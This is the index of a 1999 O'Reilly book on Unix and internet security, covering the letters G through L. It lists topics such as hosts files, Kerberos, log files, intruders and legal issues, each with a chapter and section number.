guessing passwords : (see cracking, passwords)<br />

guest accounts<br />

4.1. Users and Groups<br />

8.1.4. Open Accounts<br />

8.1.4.6. Potential problems with rsh<br />

8.8.7. Algorithm and Library Changes<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_g.htm (3 of 3) [2002-04-12 10:43:46]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: H<br />

hacker challenges : 27.2.4. Hacker Challenges<br />

hackers : 1. Introduction<br />

Haley, Chuck : 1.3. History of <strong>UNIX</strong><br />

Halon fire extinguishers : 12.2.1.1. Fire<br />

and radio transmitters : 12.2.1.8. Electrical noise<br />

halt command : 24.2.6. Anatomy of a Break-in<br />

hanging up modem : (see signals)<br />

harassment : 26.4.7. Harassment, Threatening Communication, and Defamation<br />

hard copy : (see paper)<br />

hard disks : (see media)<br />

hardcopy device, logging to : 10.5.2.1. Logging to a printer<br />

hardware<br />

bugs in : 27.2.1. Hardware Bugs<br />

failure of : 7.1.1.1. A taxonomy of computer failures<br />

food and drink threats : 12.2.2.1. Food and drink<br />

modems<br />

14. Telephone <strong>Sec</strong>urity<br />

14.6. Additional <strong>Sec</strong>urity for Modems<br />

physical security of<br />

12.2. Protecting Computer Hardware<br />

12.2.7. Related Concerns<br />

read-only filesystems : 9.1.2. Read-only Filesystems<br />

seized as evidence : 26.2.4. Hazards of Criminal Prosecution<br />

hash functions : 6.5.1. Message Digests<br />

hash mark (#), disabling services with : 17.3. Primary <strong>UNIX</strong> Network Services<br />

HAVAL algorithm : 6.5.4.3. HAVAL<br />

HAVAL algorithm : 23.9. A Good Random Seed Generator<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_h.htm (1 of 3) [2002-04-12 10:43:47]


Index<br />

HDB UUCP : 15.2. Versions of UUCP<br />

header, packet : 16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

heat, extreme : 12.2.1.6. Temperature extremes<br />

Hellman, Martin : 6.4.5.1. Double DES<br />

Hellman-Merkle : 18.6. Dependence on Third Parties<br />

Hewlett-Packard (HP) : F.3.4.17. Hewlett-Packard customers<br />

hidden<br />

data, in CGI scripts : 18.2.3.1. Do not trust the user's browser!<br />

files, created by intruders : 24.4.1.7. Hidden files and directories<br />

space : 25.2.2.7. Hidden space<br />

hijacking Telnet sessions : 17.3.3. TELNET (TCP Port 23)<br />

history file (csh)<br />

10.4.1. Shell History<br />

15.1.1.1. uucp with the C shell<br />

hit lists of passwords : 3.6.1. Bad Passwords: Open Doors<br />

holes, security : (see security holes)<br />

HOME variable, attacks via : 11.5.1.3. $HOME attacks<br />

HoneyDanBer (HDB) UUCP : 15.2. Versions of UUCP<br />

Honeyman, Peter : 15.2. Versions of UUCP<br />

hostnames<br />

16.2.3. Hostnames<br />

hosts<br />

16.2.3.1. The /etc/hosts file<br />

controlling access to : 17.2. Controlling Access to Servers<br />

name service and<br />

16.2.6. Name Service<br />

16.2.6.2. Other naming services<br />

NID passwords for : 19.3.2.2. Creating passwords for hosts<br />

trusted : (see trusted, hosts)<br />

hosts file : 16.2.3.1. The /etc/hosts file<br />

hosts.equiv file<br />

17.3.18.4. The ~/.rhosts file<br />

17.3.18.6. /etc/hosts.lpd file<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_h.htm (2 of 3) [2002-04-12 10:43:47]


Index<br />

24.4.1.5. Changes to the /etc/hosts.equiv file<br />

hosts.lpd file : 17.3.18.6. /etc/hosts.lpd file<br />

HP (Hewlett-Packard) : F.3.4.17. Hewlett-Packard customers<br />

HP-UX<br />

access control lists : 5.2.5.2. HP-UX access control lists<br />

context-dependent files : 5.9.2. Context-Dependent Files<br />

.htaccess file : 18.3.1. The access.conf and .htaccess Files<br />

HTML documents<br />

controlling access to<br />

18.3. Controlling Access to Files on Your Server<br />

18.3.3. Setting Up Web Users and Passwords<br />

encrypting : 18.4.1. Eavesdropping Over the Wire<br />

server-side includes<br />

18.2.2.2. Additional configuration issues<br />

18.3.2. Commands Within the Block<br />

htpasswd program : 18.3.3. Setting Up Web Users and Passwords<br />

HTTP (Hypertext Transfer Protocol) : 17.3.9. HyperText Transfer Protocol (HTTP) (TCP Port 80)<br />

and anonymous FTP : 18.2.4.1. Beware mixing HTTP with anonymous FTP<br />

logging downloaded files : 10.3.5. access_log Log File<br />

<strong>Sec</strong>ure : (see <strong>Sec</strong>ure HTTP)<br />

http server<br />

group file : 18.3.2. Commands Within the Block<br />

log files of : 18.4.2. Eavesdropping Through Log Files<br />

password file : 18.3.2. Commands Within the Block<br />

httpd.conf file : 18.2.1. The Server's UID<br />

human error and backups : 7.1.4. Guarding Against Media Failure<br />

humidity : 12.2.1.11. Humidity<br />

hypertext links, encrypting : 18.4.1. Eavesdropping Over the Wire<br />

Hypertext Transfer Protocol : (see HTTP)<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_h.htm (3 of 3) [2002-04-12 10:43:47]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: I<br />

I/O : (see input/output)<br />

ICMP (<strong>Internet</strong> Control Message Protocol) : 16.2.4.1. ICMP<br />

IDEA (International Data Encryption Algorithm)<br />

6.4.1. Summary of Private Key Systems<br />

6.6.3.1. Encrypting files with IDEA<br />

identd daemon : 17.3.12. Identification Protocol (auth) (TCP Port 113)<br />

identification protocol : 17.3.12. Identification Protocol (auth) (TCP Port 113)<br />

identifiers : 3.1. Usernames<br />

IEEE Computer Society : F.1.7. IEEE Computer Society<br />

IFS variable<br />

5.5.3.2. Another SUID example: IFS and the /usr/lib/preserve hole<br />

23.4. Tips on Writing SUID/SGID Programs<br />

attacks via : 11.5.1.2. IFS attacks<br />

ignore (in Swatch command) : 10.6.2. The Swatch Configuration File<br />

immutable files : 9.1.1. Immutable and Append-Only Files<br />

importing NIS accounts<br />

19.4.1. Including or excluding specific accounts:<br />

19.4.4.2. Using netgroups to limit the importing of accounts<br />

in.named daemon : 16.2.6.1. DNS under <strong>UNIX</strong><br />

includes : (see server-side includes)<br />

Includes option : 18.3.2. Commands Within the Block<br />

IncludesNoExec option : 18.3.2. Commands Within the Block<br />

incremental backups : 7.1.3. Types of Backups<br />

indecent material : 26.4.5. Pornography and Indecent Material<br />

index.html file, absence of : 18.2.2.2. Additional configuration issues<br />

inetd daemon<br />

17.1.2. Starting the Servers<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_i.htm (1 of 5) [2002-04-12 10:43:47]


Index<br />

17.1.3. The /etc/inetd Program<br />

-nowait option : 25.3.1. Service Overloading<br />

-t (trace) option : 10.3.6. Logging Network Services<br />

denial-of-service attacks : 17.1.3. The /etc/inetd Program<br />

inetd.conf file<br />

11.5.3.2. inetd.conf<br />

17.3. Primary <strong>UNIX</strong> Network Services<br />

information : (see data)<br />

init program<br />

5.3.2. Common umask Values<br />

C.5.1. Process #1: /etc/init<br />

initialization vector (IV) : 6.4.4.2. DES modes<br />

initializing<br />

environment variables : 11.5.2.7. Other initializations<br />

system, files for : 11.5.3.5. System initialization files<br />

inittab program<br />

14.5.1. Hooking Up a Modem to Your Computer<br />

C.5.1. Process #1: /etc/init<br />

INND program : 17.3.13. Network News Transport Protocol (NNTP) (TCP Port 119)<br />

inodes<br />

5.1. Files<br />

5.1.2. Inodes<br />

change time : (see ctime)<br />

for device files : 5.6. Device Files<br />

problems with : 25.2.2.3. Inode problems<br />

input/output (I/O)<br />

checking for meta characters : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

portable library : 1.3. History of <strong>UNIX</strong><br />

insects : 12.2.1.7. Bugs (biological)<br />

installing<br />

cables : 12.2.4.2. Network cables<br />

Kerberos : 19.6.3. Installing Kerberos<br />

logging installations : 10.7.2.1. Exception and activity reports<br />

physical security plan for : 12.1.1. The Physical <strong>Sec</strong>urity Plan<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_i.htm (2 of 5) [2002-04-12 10:43:47]


Index<br />

insurance<br />

26.1. Legal Options After a Break-in<br />

26.2.6. Other Tips<br />

integrity<br />

2.1. Planning Your <strong>Sec</strong>urity Needs<br />

9. Integrity Management<br />

9.3. A Final Note<br />

11.1.5. Viruses<br />

12.3. Protecting Data<br />

12.3.6. Key Switches<br />

Kerberos : 19.6.1.3. Authentication, data integrity, and secrecy<br />

management checklist : A.1.1.8. Chapter 9: Integrity Management<br />

<strong>Sec</strong>ure RPC : 19.3.4. Limitations of <strong>Sec</strong>ure RPC<br />

software for checking : 19.5.5. NIS+ Limitations<br />

international cryptography export<br />

6.4.4.1. Use and export of DES<br />

6.7.2. Cryptography and Export Controls<br />

International Data Encryption Algorithm (IDEA)<br />

6.4.1. Summary of Private Key Systems<br />

6.6.3.1. Encrypting files with IDEA<br />

<strong>Internet</strong><br />

16.1.1. The <strong>Internet</strong><br />

18. WWW <strong>Sec</strong>urity<br />

(see also World Wide Web)<br />

addresses<br />

16.2.1. <strong>Internet</strong> Addresses<br />

16.2.1.3. CIDR addresses<br />

daemon : (see inetd daemon)<br />

domain as NIS domain : 19.4.3. NIS Domains<br />

firewalls : (see firewalls)<br />

servers : (see servers, <strong>Internet</strong>)<br />

Worm program : 1. Introduction<br />

Worm program Worm program : 23.1.1. The Lesson of the <strong>Internet</strong> Worm<br />

<strong>Internet</strong> Control Message Protocol (ICMP) : 16.2.4.1. ICMP<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_i.htm (3 of 5) [2002-04-12 10:43:47]


Index<br />

<strong>Internet</strong> Packet Exchange (IPX) : 16.4.1. IPX<br />

<strong>Internet</strong> Relay Chat (IRC) : 17.3.23. Other TCP Ports: MUDs and <strong>Internet</strong> Relay Chat (IRC)<br />

<strong>Internet</strong> <strong>Sec</strong>urity Scanner (ISS) : 17.6.2. ISS<br />

intruders : 1. Introduction<br />

confronting : 24.2.2. What to Do When You Catch Somebody<br />

creating hidden files : 24.4.1.7. Hidden files and directories<br />

discovering<br />

24.2. Discovering an Intruder<br />

24.2.6. Anatomy of a Break-in<br />

legal options regarding : 26.1. Legal Options After a Break-in<br />

responding to<br />

24. Discovering a Break-in<br />

24.7. Damage Control<br />

tracking from log files : 24.3. The Log Files: Discovering an Intruder's Tracks<br />

ioctl system call : C.1.3.4. Process groups and sessions<br />

IP addresses<br />

controlling access by : 17.2. Controlling Access to Servers<br />

name service and<br />

16.2.6. Name Service<br />

16.2.6.2. Other naming services<br />

restricting access by : 18.3. Controlling Access to Files on Your Server<br />

IP numbers, monitoring : 12.3.1.2. Eavesdropping by Ethernet and 10Base-T<br />

IP packets<br />

16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

16.2.4. Packets and Protocols<br />

16.2.4.3. UDP<br />

eavesdropping : 16.3.1. Link-level <strong>Sec</strong>urity<br />

monitoring : 12.3.1.2. Eavesdropping by Ethernet and 10Base-T<br />

sniffing<br />

16.3.1. Link-level <strong>Sec</strong>urity<br />

17.3.3. TELNET (TCP Port 23)<br />

IP protocols<br />

1.4.3. Add-On Functionality Breeds Problems<br />

16.2.4. Packets and Protocols<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_i.htm (4 of 5) [2002-04-12 10:43:47]


Index<br />

16.2.4.3. UDP<br />

IP security<br />

16.3. IP <strong>Sec</strong>urity<br />

16.3.3. Authentication<br />

IP services : (see network services)<br />

IP spoofing<br />

1.4.3. Add-On Functionality Breeds Problems<br />

16.3. IP <strong>Sec</strong>urity<br />

IPv4 (IP Version 4)<br />

16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

16.2.6.2. Other naming services<br />

IPX (<strong>Internet</strong> Packet Exchange) : 16.4.1. IPX<br />

IRC (<strong>Internet</strong> Relay Chat) : 17.3.23. Other TCP Ports: MUDs and <strong>Internet</strong> Relay Chat (IRC)<br />

IRIX wtmpx file : 10.1.2. utmp and wtmp Files<br />

ISS (<strong>Internet</strong> <strong>Sec</strong>urity Scanner)<br />

17.6.2. ISS<br />

E.4.4. ISS (<strong>Internet</strong> <strong>Sec</strong>urity Scanner)<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_i.htm (5 of 5) [2002-04-12 10:43:47]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: J<br />

Java programming language<br />

11.1.5. Viruses<br />

18.5.1. Executing Code from the Net<br />

Joe accounts<br />

3.6.2. Smoking Joes<br />

8.8.3.1. Joetest: a simple password cracker<br />

Joy, Bill : 1.3. History of <strong>UNIX</strong><br />

JP Morgan : F.3.4.18. JP Morgan employees and customers<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_j.htm [2002-04-12 10:43:48]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: K<br />

Karn, Phil : 6.6.2. des: The Data Encryption Standard<br />

Kerberos system<br />

8.7.3. Code Books<br />

19.6. Kerberos<br />

19.6.5. Kerberos Limitations<br />

E.4.5. Kerberos<br />

installing : 19.6.3. Installing Kerberos<br />

RPC system and : 19.2.2.4. AUTH_KERB<br />

Versions 4 and 5 : 19.6.1.4. Kerberos 4 vs. Kerberos 5<br />

versus <strong>Sec</strong>ure RPC : 19.6.2. Kerberos vs. <strong>Sec</strong>ure RPC<br />

kermit program<br />

14.5. Modems and <strong>UNIX</strong><br />

14.5.3.3. Privilege testing<br />

kernel<br />

1.2. What Is an Operating System?<br />

key<br />

5.5.3. SUID Shell Scripts<br />

escrow : 6.1.3. Modern Controversy<br />

fingerprints : 6.6.3.6. PGP detached signatures<br />

search<br />

6.2.3. Cryptographic Strength<br />

8.6.1. The crypt() Algorithm<br />

switches : 12.3.6. Key Switches<br />

keylogin program<br />

19.3.3. Using <strong>Sec</strong>ure RPC<br />

19.5.4. Using NIS+<br />

keylogout program : 19.3.3. Using <strong>Sec</strong>ure RPC<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_k.htm (1 of 3) [2002-04-12 10:43:48]


Index<br />

keyserv process<br />

19.3.1.1. Proving your identity<br />

19.3.2.3. Making sure <strong>Sec</strong>ure RPC programs are running on every workstation<br />

19.5.4. Using NIS+<br />

keystore file : 19.3.1.1. Proving your identity<br />

keystrokes<br />

monitoring<br />

17.3.21.2. X security<br />

24.2.3. Monitoring the Intruder<br />

monitoring<br />

17.3.21.2. X security<br />

(see also sniffers)<br />

time between : 23.8. Picking a Random Seed<br />

kill command<br />

17.3.4.2. Using sendmail to receive email<br />

24.2.5. Getting Rid of the Intruder<br />

C.4. The kill Command<br />

to stop process overload<br />

25.2.1.1. Too many processes<br />

25.2.1.2. System overload attacks<br />

kinit program : 19.6.4. Using Kerberos<br />

kmem device<br />

5.6. Device Files<br />

11.1.2. Back Doors and Trap Doors<br />

known text attacks : 6.2.3. Cryptographic Strength<br />

Koblas, David : 22.4. SOCKS<br />

Koblas, Michelle : 22.4. SOCKS<br />

ksh (Korn shell)<br />

11.5.1. Shell Features<br />

24.4.1.7. Hidden files and directories<br />

C.5.3. Running the User's Shell<br />

(see also shells)<br />

history file : 10.4.1. Shell History<br />

restricted shell : 8.1.4.3. Restricted Korn shell<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_k.htm (2 of 3) [2002-04-12 10:43:48]


Index<br />

TMOUT variable : 12.3.5.1. Built-in shell autologout<br />

umask and : 5.3.1. The umask Command<br />

ksh93 shell<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

24.4.1.7. Hidden files and directories<br />

.kshrc file : 11.5.2.2. .cshrc, .kshrc<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_k.htm (3 of 3) [2002-04-12 10:43:48]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: L<br />

L-devices file : 14.5.1. Hooking Up a Modem to Your Computer<br />

L.cmds file : 15.4.3. L.cmds: Providing Remote Command Execution<br />

L.sys file : 15.3.3. <strong>Sec</strong>urity of L.sys and Systems Files<br />

Lai, Xuejia : 6.4.1. Summary of Private Key Systems<br />

laid-off employees : 13.2.6. Departure<br />

LaMacchia, Brian : 19.3.4. Limitations of <strong>Sec</strong>ure RPC<br />

LANs (local area networks)<br />

16.1. Networking<br />

16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

laptop computers : 12.2.6.3. Portables<br />

last program<br />

8.4.3. Finding Dormant Accounts<br />

10.1.2. utmp and wtmp Files<br />

10.1.3. last Program<br />

10.1.3.1. Pruning the wtmp file<br />

15.3.1. Assigning Additional UUCP Logins<br />

-f option : 10.1.3.1. Pruning the wtmp file<br />

lastcomm program<br />

10.2. The acct/pacct Process Accounting File<br />

10.2.2. Accounting with BSD<br />

lastlog file : 10.1.1. lastlog File<br />

laws<br />

26. Computer <strong>Sec</strong>urity and U.S. Law<br />

26.4.7. Harassment, Threatening Communication, and Defamation<br />

backups and : 7.1.7. Legal Issues<br />

checklist for : A.1.1.25. Chapter 26: Computer <strong>Sec</strong>urity and U.S. Law<br />

copyright<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_l.htm (1 of 9) [2002-04-12 10:43:49]


Index<br />

9.2.1. Comparison Copies<br />

26.4.2. Copyright Infringement<br />

26.4.2.1. Software piracy and the SPA<br />

criminal prosecution<br />

26.2. Criminal Prosecution<br />

26.2.7. A Final Note on Criminal Actions<br />

Electronic Communications Privacy Act (ECPA) : 26.2.3. Federal Computer Crime Laws<br />

encryption<br />

6.7. Encryption and U.S. Law<br />

6.7.2. Cryptography and Export Controls<br />

12.2.6.3. Portables<br />

enforcement agencies : 14.4.4.1. Kinds of eavesdropping<br />

export<br />

6.4.4.1. Use and export of DES<br />

6.7.2. Cryptography and Export Controls<br />

26.4.1. Munitions Export<br />

federal enforcement<br />

26.2.2. Federal Jurisdiction<br />

26.2.3. Federal Computer Crime Laws<br />

indecent material : 26.4.5. Pornography and Indecent Material<br />

liability<br />

26.4. Other Liability<br />

26.4.7. Harassment, Threatening Communication, and Defamation<br />

monitoring keystrokes : 24.2.3. Monitoring the Intruder<br />

non-citizen access : 26.4.1. Munitions Export<br />

patents : 26.4.4. Patent Concerns<br />

for portable computers : 12.2.6.3. Portables<br />

resources on : D.1.1. Other Computer References<br />

search warrants<br />

26.2.4. Hazards of Criminal Prosecution<br />

26.2.5. If You or One of Your Employees Is a Target of an Investigation...<br />

smoking : 12.2.1.2. Smoke<br />

state and local enforcement : 26.2.1. The Local Option<br />

trademarks : 26.4.3. Trademark Violations<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_l.htm (2 of 9) [2002-04-12 10:43:49]


Index<br />

vendor liability : 18.5.2. Trusting Your Software Vendor<br />

lawsuits (civil) : 26.3. Civil Actions<br />

leased telephone lines : 14.5.4. Physical Protection of Modems<br />

least privilege<br />

5.5.3.2. Another SUID example: IFS and the /usr/lib/preserve hole<br />

13.2.5. Least Privilege and Separation of Duties<br />

Lee, Ying-Da : 22.4. SOCKS<br />

Lesk, Mike<br />

1.3. History of <strong>UNIX</strong><br />

15.2. Versions of UUCP<br />

liability, legal<br />

26.4. Other Liability<br />

26.4.7. Harassment, Threatening Communication, and Defamation<br />

/lib directory : 11.5.3.6. Other files<br />

license agreements : 18.5.2. Trusting Your Software Vendor<br />

comparison copies and : 9.2.1. Comparison Copies<br />

lie-detector tests : 13.1. Background Checks<br />

lightning<br />

12.2. Protecting Computer Hardware<br />

12.2.1.9. Lightning<br />

limit command : 25.2.5. Soft Process Limits: Preventing Accidental Denial of Service<br />

Limit command () : 18.3.2. Commands Within the Block<br />

limited user access : 8.1.5.1. Limited users<br />

link-level security : 16.3.1. Link-level <strong>Sec</strong>urity<br />

links<br />

encryption of : 18.4.1. Eavesdropping Over the Wire<br />

link-level security : 16.3.1. Link-level <strong>Sec</strong>urity<br />

static : 23.4. Tips on Writing SUID/SGID Programs<br />

symbolic, following (Web)<br />

18.2.2.2. Additional configuration issues<br />

18.3.2. Commands Within the Block<br />

lint program : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

LINUX operating system<br />

1.3. History of <strong>UNIX</strong><br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_l.htm (3 of 9) [2002-04-12 10:43:49]


Index<br />

3.3. Entering Your Password<br />

23.1.2.1. What they found<br />

ext2 filesystem : 25.2.2.6. Reserved space<br />

random number generators : 23.7.4. Other random number generators<br />

Live Script : 18.5.2. Trusting Your Software Vendor<br />

load shedding : 23.3. Tips on Writing Network Programs<br />

local<br />

area networks (LANs)<br />

16.1. Networking<br />

16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

authentication (NIS+) : 19.5.4. Using NIS+<br />

law enforcement : 26.2.1. The Local Option<br />

storage<br />

12.3.4. Protecting Local Storage<br />

12.3.4.5. Function keys<br />

users, and USERFILE : 15.4.1.2. USERFILE entries for local users<br />

lock program : 12.3.5.2. X screen savers<br />

locked accounts : 3.3. Entering Your Password<br />

locking files : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

log files<br />

11.5.3.5. System initialization files<br />

(see also logging)<br />

access_log<br />

10.3.5. access_log Log File<br />

18.4.2. Eavesdropping Through Log Files<br />

aculog : 10.3.1. aculog File<br />

agent_log file : 18.4.2. Eavesdropping Through Log Files<br />

backing up : 10.2.2. Accounting with BSD<br />

lastlog : 10.1.1. lastlog File<br />

managing : 10.8. Managing Log Files<br />

manually generated<br />

10.7. Handwritten Logs<br />

10.7.2.2. Informational material<br />

per-machine : 10.7.2. Per-Machine Logs<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_l.htm (4 of 9) [2002-04-12 10:43:49]


Index<br />

per-site : 10.7.1. Per-Site Logs<br />

refer_log file : 18.4.2. Eavesdropping Through Log Files<br />

sulog : (see sulog file)<br />

system clock and : 17.3.14. Network Time Protocol (NTP) (UDP Port 123)<br />

tracking intruders with : 24.3. The Log Files: Discovering an Intruder's Tracks<br />

/usr/adm/messages : 10.2.3. messages Log File<br />

utmp and wtmp<br />

10.1.2. utmp and wtmp Files<br />

10.1.3.1. Pruning the wtmp file<br />

uucp : 10.3.4. uucp Log Files<br />

/var/adm/acct : 10.2. The acct/pacct Process Accounting File<br />

/var/adm/loginlog : 10.1.4. loginlog File<br />

of Web servers : 18.4.2. Eavesdropping Through Log Files<br />

xferlog : 10.3.3. xferlog Log File<br />

logdaemon package : 17.3.18.5. Searching for .rhosts files<br />

logger command : 10.5.3. syslog Messages<br />

logging<br />

7.1.1.1. A taxonomy of computer failures<br />

10. Auditing and Logging<br />

10.8. Managing Log Files<br />

11.5.3.5. System initialization files<br />

21.5. Special Considerations<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

(see also log files)<br />

across networks : 10.5.2.2. Logging across the network<br />

archiving information : 7.4.2. Simple Archives<br />

breakins : 24.1.2. Rule #2: DOCUMENT<br />

C2 audit : 10.1. The Basic Log Files<br />

checklist for : A.1.1.9. Chapter 10: Auditing and Logging<br />

critical messages<br />

10.5.3. syslog Messages<br />

10.5.3.1. Beware false log entries<br />

downloaded files<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_l.htm (5 of 9) [2002-04-12 10:43:49]


Index<br />

10.3.3. xferlog Log File<br />

10.3.5. access_log Log File<br />

failed su attempts : 4.3.7. The Bad su Log<br />

file format : 8.2. Monitoring File Format<br />

files transferred by FTP : 10.3.3. xferlog Log File<br />

to hardcopy device : 10.5.2.1. Logging to a printer<br />

individual users<br />

10.4. Per-User Trails in the Filesystem<br />

10.4.3. Network Setup<br />

manually<br />

10.7. Handwritten Logs<br />

10.7.2.2. Informational material<br />

mistyped passwords : 10.5.3. syslog Messages<br />

network services : 10.3.6. Logging Network Services<br />

outgoing mail : 10.4.2. Mail<br />

potentially criminal activity : 26.2.6. Other Tips<br />

Swatch program<br />

10.6. Swatch: A Log File Tool<br />

10.6.2. The Swatch Configuration File<br />

E.4.9. Swatch<br />

syslog facility<br />

10.5. The <strong>UNIX</strong> System Log (syslog) Facility<br />

10.5.3.1. Beware false log entries<br />

UUCP : 10.3.4. uucp Log Files<br />

what not to log : 10.5.3. syslog Messages<br />

logging in<br />

C.5. Starting Up <strong>UNIX</strong> and Logging In<br />

C.5.3. Running the User's Shell<br />

FTP access without : 17.3.2.7. Allowing only FTP access<br />

Kerberos system : 19.6.1.1. Initial login<br />

last program<br />

10.1.3. last Program<br />

10.1.3.1. Pruning the wtmp file<br />

lastlog file : 10.1.1. lastlog File<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_l.htm (6 of 9) [2002-04-12 10:43:49]


Index<br />

passwords : 3.3. Entering Your Password<br />

preventing<br />

8.4. Managing Dormant Accounts<br />

8.4.3. Finding Dormant Accounts<br />

restricting : 8.3. Restricting Logins<br />

with <strong>Sec</strong>ure RPC : 19.3.3. Using <strong>Sec</strong>ure RPC<br />

startup file attacks<br />

11.5.2. Start-up File Attacks<br />

11.5.2.7. Other initializations<br />

logging out with <strong>Sec</strong>ure RPC[logging out:<strong>Sec</strong>ure RPC] : 19.3.3. Using <strong>Sec</strong>ure RPC<br />

logic bombs<br />

11.1. Programmed Threats: Definitions<br />

11.1.3. Logic Bombs<br />

27.2.2. Viruses on the Distribution Disk<br />

.login file<br />

8.5.1. <strong>Sec</strong>ure Terminals<br />

11.5.2.1. .login, .profile, /etc/profile<br />

24.4.1.6. Changes to startup files<br />

login program<br />

8.6. The <strong>UNIX</strong> Encrypted Password System<br />

11.1.2. Back Doors and Trap Doors<br />

19.5.4. Using NIS+<br />

26.2.6. Other Tips<br />

27.1.2. Trusting Trust<br />

logindevperm file : 17.3.21.1. /etc/fbtab and /etc/logindevperm<br />

loginlog file : 10.1.4. loginlog File<br />

logins<br />

authentication : 17.3.5. TACACS (UDP Port 49)<br />

FTP : 17.3.2. (FTP) File Transfer Protocol (TCP Ports 20 and 21)<br />

UUCP, additional : 15.3.1. Assigning Additional UUCP Logins<br />

logins command : 8.1.1. Accounts Without Passwords<br />

-d option : 8.2. Monitoring File Format<br />

-p option : 8.2. Monitoring File Format<br />

LOGNAME= command<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_l.htm (7 of 9) [2002-04-12 10:43:49]


Index<br />

15.5.1.3. A Sample Permissions file<br />

15.5.2. Permissions Commands<br />

.logout file : 19.3.3. Using <strong>Sec</strong>ure RPC<br />

long distance service<br />

14.5.4. Physical Protection of Modems<br />

17.3.3. TELNET (TCP Port 23)<br />

losses, cost of preventing<br />

2.3. Cost-Benefit Analysis<br />

2.3.4. Convincing Management<br />

lp (user) : 4.1. Users and Groups<br />

lpd system : 17.3.18.6. /etc/hosts.lpd file<br />

lrand48 function : 23.7.3. drand48 ( ), lrand48 ( ), and mrand48 ( )<br />

ls command<br />

5.1.4. Using the ls Command<br />

5.1.5. File Times<br />

9.2.2. Checklists and Metadata<br />

-c option : 5.1.5. File Times<br />

-d option : 9.2.2.1. Simple listing<br />

